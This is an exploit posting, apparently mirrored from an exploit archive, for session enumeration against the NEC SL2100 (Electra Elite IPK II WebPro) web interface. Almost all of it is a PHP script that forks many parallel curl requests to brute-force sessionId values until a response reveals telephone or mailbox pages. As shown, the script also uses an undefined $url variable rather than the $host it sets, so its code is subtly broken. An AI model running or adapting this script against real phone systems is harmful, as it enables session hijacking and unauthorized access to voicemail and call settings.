NEC Electra Elite IPK II WebPro 01.03.01 Exploit, Session Enumeration

# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration 
# Author: Cold z3ro
# Date: 2020-05-04
# Homepage: https://www.0x30.cc/
# Vendor Homepage: https://www.nec.com
# Version: 01.03.01
# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration 

<?php
set_time_limit(0);

$host = "192.168.0.14";

$start = 100;
$end = 30000;
$maxproc= 50;
$execute=0;

echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
sleep(3);
for ($i = $start; $i <= $end; $i++) 
{

	$pid = @pcntl_fork();
	$execute++;
	if ($execute >= $maxproc)
	{
		while (pcntl_waitpid(0, $status) != -1) 
		{
			$status = pcntl_wexitstatus($status);
			$execute =0;
			usleep(3000);
		}
	}
	if (!$pid) 
	{
		echo $url . " checking $i\n";
		login($url, $i);
		flush();
		exit; 
	}
}


function login($url, $key)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
	curl_setopt($ch, CURLOPT_TIMEOUT, 80);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
	curl_setopt($ch, CURLOPT_HEADER, FALSE);
	$content  = curl_exec($ch);
	curl_close ($ch);
	if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
	{
		die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
		
	}
}

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD